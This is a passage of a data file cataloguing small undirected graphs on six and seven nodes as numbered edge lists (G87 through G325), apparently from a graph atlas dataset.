['edgelist', 'G87', 6, [[2, 5], [3, 5], [5, 1], [3, 4], [4, 2], [4, 5]]],
['edgelist', 'G88', 6, [[2, 5], [3, 5], [5, 1], [3, 2], [4, 2], [3, 4]]],
['edgelist', 'G89', 6, [[3, 1], [6, 5], [5, 4], [6, 4], [5, 1], [3, 5]]],
['edgelist', 'G90', 6, [[4, 3], [5, 4], [1, 5], [2, 1], [3, 2], [1, 4]]],
['edgelist', 'G91', 6, [[5, 2], [4, 2], [5, 3], [4, 3], [3, 1], [2, 1]]],
['edgelist', 'G92', 6, [[6, 3], [6, 4], [6, 5], [4, 5], [6, 2], [6, 1]]],
['edgelist', 'G93', 6, [[5, 4], [5, 3], [5, 1], [2, 5], [4, 1], [6, 4]]],
['edgelist', 'G94', 6, [[5, 4], [4, 6], [6, 5], [6, 2], [4, 3], [5, 1]]],
['edgelist', 'G95', 6, [[5, 3], [2, 3], [5, 4], [5, 2], [5, 1], [1, 6]]],
['edgelist', 'G96', 6, [[2, 3], [4, 2], [1, 4], [3, 1], [5, 1], [6, 1]]],
['edgelist', 'G97', 6, [[3, 1], [5, 3], [2, 5], [3, 2], [4, 2], [6, 4]]],
['edgelist', 'G98', 6, [[2, 3], [4, 2], [1, 4], [3, 1], [5, 1], [6, 4]]],
['edgelist', 'G99', 6, [[6, 4], [3, 6], [3, 1], [5, 3], [5, 4], [4, 2]]],
['edgelist', 'G100', 6, [[1, 3], [4, 5], [2, 1], [6, 4], [5, 6], [4, 1]]],
['edgelist', 'G101', 6, [[2, 3], [4, 1], [6, 4], [5, 6], [1, 5], [6, 1]]],
['edgelist', 'G102', 6, [[5, 4], [2, 3], [5, 1], [4, 3], [4, 2], [6, 1]]],
['edgelist', 'G103', 6, [[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4]]],
['edgelist', 'G104', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6]]],
['edgelist', 'G105', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6]]],
['edgelist', 'G106', 6, [[2, 4], [3, 2], [4, 3], [1, 5], [6, 1], [5, 6]]],
['edgelist',
'G107',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6]]],
['edgelist',
'G108',
6,
[[2, 5], [3, 5], [3, 2], [4, 2], [3, 4], [3, 1], [1, 2]]],
['edgelist',
'G109',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G110',
6,
[[1, 2], [4, 3], [1, 3], [4, 1], [4, 2], [6, 2], [6, 3]]],
['edgelist',
'G111',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [4, 5]]],
['edgelist',
'G112',
6,
[[2, 1], [5, 2], [3, 5], [4, 3], [6, 2], [3, 6], [2, 3]]],
['edgelist',
'G113',
6,
[[1, 5], [3, 1], [2, 3], [4, 2], [6, 4], [4, 1], [3, 4]]],
['edgelist',
'G114',
6,
[[2, 5], [3, 5], [3, 4], [3, 2], [4, 2], [5, 6], [1, 5]]],
['edgelist',
'G115',
6,
[[2, 1], [5, 2], [3, 5], [4, 3], [6, 2], [3, 6], [5, 6]]],
['edgelist',
'G116',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5]]],
['edgelist',
'G117',
6,
[[1, 6], [5, 1], [6, 5], [1, 3], [4, 1], [4, 3], [1, 2]]],
['edgelist',
'G118',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [5, 2]]],
['edgelist',
'G119',
6,
[[1, 2], [5, 1], [2, 5], [1, 3], [4, 1], [4, 3], [4, 6]]],
['edgelist',
'G120',
6,
[[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4], [4, 5]]],
['edgelist',
'G121',
6,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2]]],
['edgelist',
'G122',
6,
[[2, 6], [1, 2], [5, 1], [4, 5], [3, 4], [2, 3], [1, 4]]],
['edgelist',
'G123',
6,
[[2, 5], [3, 5], [5, 1], [1, 6], [4, 2], [3, 4], [3, 2]]],
['edgelist',
'G124',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [6, 2]]],
['edgelist',
'G125',
6,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4]]],
['edgelist',
'G126',
6,
[[6, 1], [4, 6], [3, 4], [1, 3], [2, 4], [5, 2], [4, 5]]],
['edgelist',
'G127',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [3, 4]]],
['edgelist',
'G128',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4]]],
['edgelist',
'G129',
6,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4]]],
['edgelist',
'G130',
6,
[[2, 3], [1, 2], [3, 1], [4, 1], [5, 4], [6, 5], [4, 6]]],
['edgelist',
'G131',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2]]],
['edgelist',
'G132',
6,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4]]],
['edgelist',
'G133',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 1], [1, 5]]],
['edgelist',
'G134',
6,
[[2, 3], [4, 2], [1, 4], [2, 1], [3, 1], [4, 3], [6, 4], [5, 1]]],
['edgelist',
'G135',
6,
[[1, 2], [3, 5], [1, 3], [6, 3], [4, 2], [4, 3], [3, 2], [5, 2]]],
['edgelist',
'G136',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [2, 6]]],
['edgelist',
'G137',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 5]]],
['edgelist',
'G138',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [3, 2], [6, 2]]],
['edgelist',
'G139',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [6, 1]]],
['edgelist',
'G140',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [4, 1], [6, 2]]],
['edgelist',
'G141',
6,
[[3, 1], [4, 3], [5, 4], [6, 5], [3, 6], [2, 3], [5, 2], [6, 4]]],
['edgelist',
'G142',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5]]],
['edgelist',
'G143',
6,
[[1, 2], [3, 6], [1, 3], [5, 1], [4, 2], [4, 3], [6, 2], [6, 4]]],
['edgelist',
'G144',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [4, 5]]],
['edgelist',
'G145',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 3], [1, 3]]],
['edgelist',
'G146',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4]]],
['edgelist',
'G147',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 3]]],
['edgelist',
'G148',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [2, 5], [1, 2]]],
['edgelist',
'G149',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1]]],
['edgelist',
'G150',
6,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2]]],
['edgelist',
'G151',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6]]],
['edgelist',
'G152',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2]]],
['edgelist',
'G153',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1]]],
['edgelist',
'G154',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3]]],
['edgelist',
'G155',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2], [3, 5], [1, 4]]],
['edgelist',
'G156',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 3]]],
['edgelist',
'G157',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [1, 5]]],
['edgelist',
'G158',
6,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4], [5, 6]]],
['edgelist',
'G159',
6,
[[3, 1], [5, 2], [2, 3], [6, 5], [3, 6], [4, 2], [6, 4], [4, 3], [5, 4]]],
['edgelist',
'G160',
6,
[[1, 2], [3, 6], [1, 3], [4, 1], [4, 2], [4, 3], [3, 2], [6, 2], [5, 6]]],
['edgelist',
'G161',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [5, 6]]],
['edgelist',
'G162',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [4, 1]]],
['edgelist',
'G163',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [1, 5], [2, 1], [5, 2]]],
['edgelist',
'G164',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [5, 2], [2, 1], [6, 2]]],
['edgelist',
'G165',
6,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [6, 5], [5, 1], [6, 1]]],
['edgelist',
'G166',
6,
[[5, 4], [1, 5], [2, 1], [3, 2], [4, 3], [1, 6], [6, 4], [1, 4], [2, 6]]],
['edgelist',
'G167',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [5, 1]]],
['edgelist',
'G168',
6,
[[2, 4], [3, 2], [1, 3], [6, 1], [5, 6], [4, 5], [4, 3], [1, 4], [3, 5]]],
['edgelist',
'G169',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [3, 6], [1, 6], [3, 1], [6, 2]]],
['edgelist',
'G170',
6,
[[2, 6], [5, 2], [1, 5], [6, 1], [3, 6], [5, 3], [4, 5], [6, 4], [3, 1]]],
['edgelist',
'G171',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 1], [6, 5], [6, 3], [6, 4]]],
['edgelist',
'G172',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [4, 1], [6, 3], [6, 1], [6, 2]]],
['edgelist',
'G173',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [5, 3], [6, 3]]],
['edgelist',
'G174',
6,
[[3, 4], [1, 3], [4, 1], [5, 4], [2, 5], [6, 2], [5, 6], [2, 1], [6, 3]]],
['edgelist',
'G175',
6,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [1, 4], [6, 3], [5, 2]]],
['edgelist',
'G176',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3]]],
['edgelist',
'G177',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[5, 6]]],
['edgelist',
'G178',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 6]]],
['edgelist',
'G179',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1]]],
['edgelist',
'G180',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6]]],
['edgelist',
'G181',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5]]],
['edgelist',
'G182',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3]]],
['edgelist',
'G183',
6,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3]]],
['edgelist',
'G184',
6,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3]]],
['edgelist',
'G185',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2]]],
['edgelist',
'G186',
6,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4]]],
['edgelist',
'G187',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5]]],
['edgelist',
'G188',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2]]],
['edgelist',
'G189',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[4, 3],
[1, 4]]],
['edgelist',
'G190',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1]]],
['edgelist',
'G191',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3],
[2, 6]]],
['edgelist',
'G192',
6,
[[1, 2],
[3, 5],
[1, 3],
[3, 2],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4],
[1, 4]]],
['edgelist',
'G193',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1],
[5, 6]]],
['edgelist',
'G194',
6,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[1, 3]]],
['edgelist',
'G195',
6,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[6, 2]]],
['edgelist',
'G196',
6,
[[2, 4],
[5, 2],
[4, 5],
[3, 4],
[1, 3],
[5, 1],
[6, 5],
[3, 6],
[5, 3],
[1, 6],
[2, 6]]],
['edgelist',
'G197',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2]]],
['edgelist',
'G198',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3]]],
['edgelist',
'G199',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[1, 4]]],
['edgelist',
'G200',
6,
[[1, 2],
[2, 3],
[1, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4]]],
['edgelist',
'G201',
6,
[[4, 3],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[3, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5]]],
['edgelist',
'G202',
6,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 6]]],
['edgelist',
'G203',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4]]],
['edgelist',
'G204',
6,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4]]],
['edgelist',
'G205',
6,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4],
[1, 5]]],
['edgelist',
'G206',
6,
[[1, 2],
[2, 3],
[1, 3],
[4, 3],
[4, 2],
[5, 1],
[3, 5],
[6, 2],
[1, 6],
[5, 6],
[4, 5],
[6, 4],
[4, 1]]],
['edgelist',
'G207',
6,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4]]],
['edgelist',
'G208',
6,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6]]],
['edgelist', 'G209', 7, []],
['edgelist', 'G210', 7, [[7, 6]]],
['edgelist', 'G211', 7, [[3, 4], [2, 3]]],
['edgelist', 'G212', 7, [[6, 5], [7, 1]]],
['edgelist', 'G213', 7, [[1, 5], [5, 3], [3, 1]]],
['edgelist', 'G214', 7, [[1, 2], [1, 7], [1, 6]]],
['edgelist', 'G215', 7, [[6, 5], [7, 1], [6, 7]]],
['edgelist', 'G216', 7, [[4, 3], [2, 3], [6, 7]]],
['edgelist', 'G217', 7, [[4, 2], [6, 7], [1, 5]]],
['edgelist', 'G218', 7, [[3, 6], [7, 3], [6, 7], [2, 3]]],
['edgelist', 'G219', 7, [[2, 3], [5, 2], [6, 5], [3, 6]]],
['edgelist', 'G220', 7, [[2, 1], [6, 2], [2, 3], [5, 2]]],
['edgelist', 'G221', 7, [[2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G222', 7, [[4, 5], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G223', 7, [[5, 3], [1, 5], [3, 1], [6, 7]]],
['edgelist', 'G224', 7, [[1, 2], [7, 1], [1, 6], [5, 3]]],
['edgelist', 'G225', 7, [[4, 2], [6, 5], [7, 6], [1, 7]]],
['edgelist', 'G226', 7, [[1, 5], [4, 1], [3, 6], [7, 3]]],
['edgelist', 'G227', 7, [[3, 4], [2, 3], [7, 1], [6, 5]]],
['edgelist', 'G228', 7, [[1, 5], [4, 1], [2, 4], [5, 2], [2, 1]]],
['edgelist', 'G229', 7, [[3, 6], [7, 3], [6, 7], [5, 3], [4, 3]]],
['edgelist', 'G230', 7, [[5, 3], [5, 1], [3, 1], [6, 5], [7, 1]]],
['edgelist', 'G231', 7, [[3, 6], [7, 3], [6, 7], [2, 3], [1, 2]]],
['edgelist', 'G232', 7, [[5, 2], [1, 5], [4, 1], [2, 4], [3, 2]]],
['edgelist', 'G233', 7, [[2, 3], [1, 2], [5, 1], [4, 5], [3, 4]]],
['edgelist', 'G234', 7, [[6, 2], [6, 1], [3, 6], [4, 6], [5, 6]]],
['edgelist', 'G235', 7, [[2, 6], [7, 2], [2, 1], [3, 2], [4, 3]]],
['edgelist', 'G236', 7, [[2, 6], [5, 2], [3, 4], [7, 3], [3, 2]]],
['edgelist', 'G237', 7, [[2, 6], [7, 2], [2, 3], [3, 4], [5, 4]]],
['edgelist', 'G238', 7, [[3, 2], [4, 3], [5, 4], [6, 5], [4, 7]]],
['edgelist', 'G239', 7, [[7, 6], [3, 7], [2, 3], [6, 3], [4, 5]]],
['edgelist', 'G240', 7, [[5, 4], [6, 5], [7, 6], [1, 7], [2, 1]]],
['edgelist', 'G241', 7, [[1, 5], [4, 1], [3, 6], [7, 3], [6, 7]]],
['edgelist', 'G242', 7, [[5, 2], [6, 3], [7, 6], [4, 7], [3, 4]]],
['edgelist', 'G243', 7, [[2, 5], [4, 2], [2, 1], [3, 2], [7, 6]]],
['edgelist', 'G244', 7, [[1, 5], [4, 1], [2, 1], [3, 2], [7, 6]]],
['edgelist', 'G245', 7, [[1, 5], [4, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G246', 7, [[7, 6], [4, 5], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G247', 7, [[3, 4], [2, 3], [7, 1], [6, 7], [6, 5]]],
['edgelist', 'G248', 7, [[1, 2], [5, 7], [6, 5], [4, 3], [7, 6]]],
['edgelist', 'G249', 7, [[2, 6], [7, 2], [6, 7], [3, 6], [2, 3], [7, 3]]],
['edgelist', 'G250', 7, [[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2]]],
['edgelist', 'G251', 7, [[1, 5], [4, 1], [2, 4], [3, 2], [2, 5], [4, 5]]],
['edgelist', 'G252', 7, [[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7]]],
['edgelist', 'G253', 7, [[2, 3], [5, 2], [6, 5], [3, 6], [1, 2], [5, 1]]],
['edgelist', 'G254', 7, [[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1]]],
['edgelist', 'G255', 7, [[3, 6], [7, 3], [6, 7], [3, 5], [2, 3], [4, 3]]],
['edgelist', 'G256', 7, [[2, 5], [4, 2], [3, 4], [2, 3], [3, 6], [7, 3]]],
['edgelist', 'G257', 7, [[6, 5], [7, 6], [2, 7], [6, 2], [4, 7], [1, 2]]],
['edgelist', 'G258', 7, [[7, 6], [2, 7], [6, 2], [4, 2], [1, 4], [2, 5]]],
['edgelist', 'G259', 7, [[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3]]],
['edgelist', 'G260', 7, [[2, 5], [4, 2], [3, 4], [2, 3], [3, 6], [7, 6]]],
['edgelist', 'G261', 7, [[3, 4], [2, 3], [4, 7], [6, 5], [7, 6], [6, 3]]],
['edgelist', 'G262', 7, [[3, 6], [7, 3], [6, 7], [2, 5], [4, 2], [3, 2]]],
['edgelist', 'G263', 7, [[5, 6], [1, 5], [4, 1], [3, 4], [5, 3], [7, 4]]],
['edgelist', 'G264', 7, [[1, 5], [4, 1], [2, 4], [7, 6], [2, 5], [2, 1]]],
['edgelist', 'G265', 7, [[2, 5], [4, 2], [3, 4], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G266', 7, [[7, 4], [6, 7], [5, 6], [2, 5], [3, 2], [6, 3]]],
['edgelist', 'G267', 7, [[2, 1], [4, 2], [7, 4], [6, 7], [5, 6], [2, 5]]],
['edgelist', 'G268', 7, [[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6]]],
['edgelist', 'G269', 7, [[1, 5], [4, 1], [5, 4], [3, 6], [7, 3], [6, 7]]],
['edgelist', 'G270', 7, [[7, 4], [1, 7], [7, 3], [6, 7], [7, 2], [5, 7]]],
['edgelist', 'G271', 7, [[3, 5], [6, 3], [3, 4], [7, 3], [2, 3], [2, 1]]],
['edgelist', 'G272', 7, [[2, 1], [3, 2], [6, 3], [2, 5], [4, 2], [7, 3]]],
['edgelist', 'G273', 7, [[2, 1], [3, 2], [4, 7], [2, 4], [5, 2], [6, 5]]],
['edgelist', 'G274', 7, [[2, 1], [3, 2], [6, 3], [7, 6], [2, 5], [4, 2]]],
['edgelist', 'G275', 7, [[2, 1], [3, 5], [6, 3], [7, 6], [3, 7], [4, 3]]],
['edgelist', 'G276', 7, [[5, 1], [2, 5], [4, 2], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G277', 7, [[7, 6], [2, 3], [1, 2], [3, 1], [4, 3], [1, 5]]],
['edgelist', 'G278', 7, [[1, 5], [4, 1], [2, 1], [3, 2], [6, 3], [7, 3]]],
['edgelist', 'G279', 7, [[2, 1], [4, 2], [7, 4], [3, 7], [5, 2], [6, 5]]],
['edgelist', 'G280', 7, [[3, 6], [7, 3], [5, 3], [2, 5], [4, 2], [1, 4]]],
['edgelist', 'G281', 7, [[1, 5], [4, 1], [3, 4], [5, 3], [2, 3], [7, 6]]],
['edgelist', 'G282', 7, [[1, 5], [4, 1], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G283', 7, [[4, 5], [2, 1], [3, 2], [6, 3], [7, 6], [3, 7]]],
['edgelist', 'G284', 7, [[5, 6], [1, 5], [4, 1], [7, 4], [2, 1], [3, 2]]],
['edgelist', 'G285', 7, [[3, 6], [7, 3], [6, 7], [2, 5], [4, 2], [2, 1]]],
['edgelist', 'G286', 7, [[5, 6], [4, 5], [3, 4], [2, 3], [1, 2], [7, 1]]],
['edgelist', 'G287', 7, [[7, 5], [6, 7], [5, 6], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G288', 7, [[1, 2], [5, 1], [3, 4], [6, 3], [7, 6], [4, 7]]],
['edgelist', 'G289', 7, [[2, 3], [1, 2], [5, 1], [4, 5], [3, 4], [7, 6]]],
['edgelist',
'G290',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2], [4, 5]]],
['edgelist',
'G291',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [6, 3]]],
['edgelist',
'G292',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G293',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [2, 1]]],
['edgelist',
'G294',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3], [3, 1]]],
['edgelist',
'G295',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [3, 2], [3, 7]]],
['edgelist',
'G296',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [2, 1], [4, 5], [7, 4]]],
['edgelist',
'G297',
7,
[[1, 5], [4, 1], [3, 4], [5, 3], [3, 6], [7, 3], [4, 5]]],
['edgelist',
'G298',
7,
[[1, 5], [4, 1], [2, 4], [4, 7], [2, 5], [2, 1], [6, 5]]],
['edgelist',
'G299',
7,
[[1, 5], [4, 1], [2, 4], [7, 6], [2, 5], [2, 1], [4, 5]]],
['edgelist',
'G300',
7,
[[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7], [3, 2]]],
['edgelist',
'G301',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [3, 6]]],
['edgelist',
'G302',
7,
[[6, 3], [5, 6], [3, 5], [4, 3], [7, 4], [3, 7], [4, 2]]],
['edgelist',
'G303',
7,
[[2, 5], [4, 2], [3, 4], [5, 3], [3, 1], [3, 2], [7, 1]]],
['edgelist',
'G304',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [4, 6]]],
['edgelist',
'G305',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [4, 6]]],
['edgelist',
'G306',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [1, 3], [2, 6]]],
['edgelist',
'G307',
7,
[[4, 3], [5, 4], [4, 6], [3, 5], [6, 3], [7, 2], [7, 5]]],
['edgelist',
'G308',
7,
[[2, 3], [6, 2], [5, 6], [3, 5], [1, 3], [6, 1], [1, 4]]],
['edgelist',
'G309',
7,
[[4, 5], [2, 4], [3, 2], [7, 3], [6, 7], [2, 6], [5, 2]]],
['edgelist',
'G310',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [4, 3], [6, 4], [5, 6]]],
['edgelist',
'G311',
7,
[[7, 4], [6, 7], [2, 6], [3, 2], [4, 3], [5, 3], [6, 5]]],
['edgelist',
'G312',
7,
[[2, 3], [5, 2], [6, 5], [7, 6], [4, 7], [3, 4], [6, 3]]],
['edgelist',
'G313',
7,
[[5, 2], [4, 5], [2, 4], [3, 2], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G314',
7,
[[4, 1], [7, 4], [1, 7], [2, 1], [1, 3], [6, 1], [1, 5]]],
['edgelist',
'G315',
7,
[[2, 6], [7, 2], [2, 3], [4, 2], [5, 4], [2, 5], [5, 1]]],
['edgelist',
'G316',
7,
[[6, 1], [7, 6], [1, 7], [6, 3], [2, 6], [7, 4], [5, 7]]],
['edgelist',
'G317',
7,
[[5, 2], [1, 5], [2, 1], [3, 2], [1, 4], [7, 1], [5, 6]]],
['edgelist',
'G318',
7,
[[6, 3], [7, 6], [3, 7], [3, 5], [4, 3], [2, 1], [3, 2]]],
['edgelist',
'G319',
7,
[[5, 2], [1, 5], [4, 1], [2, 4], [3, 2], [2, 6], [7, 2]]],
['edgelist',
'G320',
7,
[[2, 1], [5, 2], [1, 5], [6, 5], [3, 2], [4, 3], [7, 2]]],
['edgelist',
'G321',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [4, 3], [6, 5], [7, 5]]],
['edgelist',
'G322',
7,
[[3, 4], [6, 3], [7, 6], [4, 7], [2, 3], [5, 6], [1, 6]]],
['edgelist',
'G323',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [2, 1], [3, 2], [7, 6]]],
['edgelist',
'G324',
7,
[[3, 6], [7, 3], [6, 7], [5, 3], [2, 3], [1, 2], [4, 2]]],
['edgelist',
'G325',
7,
[[3, 6], [7, 3], [5, 3], [2, 5], [4, 2], [3, 4], [1, 2]]],
['edgelist',
'G326',
7,
